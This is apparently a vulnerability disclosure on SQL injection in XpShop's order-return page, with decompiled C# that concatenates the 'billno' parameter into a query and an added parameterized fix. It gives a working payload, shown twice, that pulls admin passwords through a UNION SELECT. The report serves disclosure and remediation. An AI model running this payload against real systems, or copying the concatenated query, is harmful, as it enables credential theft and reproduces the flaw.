### Brief description:
There should be a few more before I wrap up; there are actually still some left, but I'm pretty tired and don't feel like doing them. I'll dig out a few more and then call it done!
### Details:
Vulnerable location: xpshop.webui.IspOrderReturnBy:
```csharp
protected void Page_Load(object sender, EventArgs e)
{
    base.Response.AddHeader("Pragma", "No-Cache");
    base.Response.Buffer = true;
    base.Response.ExpiresAbsolute = DateTime.Now.AddSeconds(-1.0);
    base.Response.Expires = 0;
    base.Response.CacheControl = "no-cache";
    OrderDB orderDB = new OrderDB();
    // The billno request parameter is handed to GetOrderID without any validation
    int orderID = orderDB.GetOrderID(base.Request["billno"].ToString());
    this.order = orderDB.GetOrderDetails(orderID);
    // rest of the decompiled method not shown in the report
}
```
Following GetOrderID:
```csharp
public int GetOrderID(string orderNo)
{
    // orderNo is concatenated straight into the SQL text, so a single quote
    // in it closes the string literal and the rest is executed as SQL
    return int.Parse(XpShopDB.ExecuteScalar(XpShopDB.ConnectionString, CommandType.Text,
        "SELECT OrderID FROM Orders WHERE OrderNo = '" + orderNo + "'", null).ToString());
}
```
Same as the earlier cases: the input goes into the database query with no filtering at all.
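As an added example (not XpShop's own code), here is what a parameterized GetOrderID looks like in the project's language: the table and column names are the ones in the report, while the connection string, the 50-character length limit and the null return for "order not found" are assumptions.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Added example, not code from the XpShop project. Assumed: the connection
// string is injected, OrderNo is at most 50 characters, and "no such order"
// is reported as null instead of an exception.
public class OrderRepository
{
    private readonly string _connectionString;

    public OrderRepository(string connectionString)
    {
        _connectionString = connectionString;
    }

    // Returns the OrderID for an order number, or null if none exists.
    // orderNo travels to the server as a typed parameter, so a quote or a
    // "union select" inside it is compared as data, never parsed as SQL.
    public int? GetOrderID(string orderNo)
    {
        if (string.IsNullOrWhiteSpace(orderNo) || orderNo.Length > 50)
        {
            return null; // reject obviously invalid input before touching the DB
        }

        const string sql = "SELECT OrderID FROM Orders WHERE OrderNo = @orderNo";

        using (var conn = new SqlConnection(_connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.CommandType = CommandType.Text;
            cmd.Parameters.Add("@orderNo", SqlDbType.NVarChar, 50).Value = orderNo;

            conn.Open();
            object result = cmd.ExecuteScalar();

            // ExecuteScalar returns null when no row matches; the original code
            // calls .ToString() on that null and throws instead of handling it.
            if (result == null || result == DBNull.Value)
            {
                return null;
            }
            return Convert.ToInt32(result);
        }
    }
}
```

The caller (Page_Load) then has to handle a null result, for example by returning a "order not found" page, rather than assuming an OrderID always comes back.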
payload:
/isporderreturnby.aspx?billno=test' union select password from admin--
### Proof of vulnerability:
http://localhost/isporderreturnby.aspx?billno=test' union select password from admin--
![1.jpg](https://images.seebug.org/upload/201510/151504072cc45fff495b45c9ad51a2820c4f6663.jpg)